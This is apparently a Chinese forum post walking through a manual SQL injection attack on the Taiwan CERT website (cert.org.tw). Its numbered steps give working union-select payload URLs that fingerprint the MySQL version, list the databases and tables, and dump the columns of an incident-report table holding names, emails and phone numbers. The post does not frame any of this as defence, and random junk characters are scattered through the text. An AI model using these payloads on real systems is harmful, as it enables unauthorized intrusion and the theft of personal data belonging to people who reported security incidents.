1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询+ Y% B5 |( i3 w8 |1 D/ E7 T: I
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解. @, ]0 `* A: A3 [
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--8 E- F" P: T% I0 z( p9 Z' t
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
; r7 @- A: N9 F9 e数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。+ d! }- O. \# t
4.判断有没有写权限
: f$ c6 K; ^/ j' L5 s0 [http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
2 L+ w# D6 H# y% x5 v+ [没办法,手动猜表啦) B: u H+ H! T# y. _' {
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1; F& d1 }0 p% U9 H6 l# B
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下7 O8 J! D' l, E. f
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
, _7 s4 G, m s: Q( N. Z' a4 ~ f成功查出所有数据库,国外的黑客就是不一般。数据库如下:
2 u- [" L3 @" R7 _* R# {" Minformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb+ M1 e# d' l* X
6.爆表,爆的是twcert库
6 M. B# f0 E* @0 ehttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
$ h3 [; H4 U* l5 R爆出如下表, Q$ k" A; n1 c' H6 ]2 m
downloadfile,irsys,newsdata,secrpt,secrpt_big5
; i8 T0 G% R+ q, j7.爆列名,这次爆的是irsys表
9 F# |* a2 ]9 r: p4 b" r( {7 Z) a+ whttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--4 u4 B& q2 O) M$ t9 L% j0 ^# z+ @$ l
爆出如下列
/ S0 _1 }4 S: v3 T2 q$ I4 zir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status7 D. v6 f1 }8 H" M/ e$ G; p( P9 H
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
. A+ |& P# j/ G; p7 f& `http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--$ y' D9 J- i* T v/ ~
返回是3,说明每个列里有3个地段
+ l+ W& x0 _0 f& h, {9.爆字段内容8 L9 F" Y W; a: W# I
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--2 r4 h- t! }' t9 \5 t
爆出name列的第一个字段的内容# }3 o+ n1 e4 T# `* T
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--9 x, u7 p; r+ T0 g
爆出name列的第二个字段的内容 |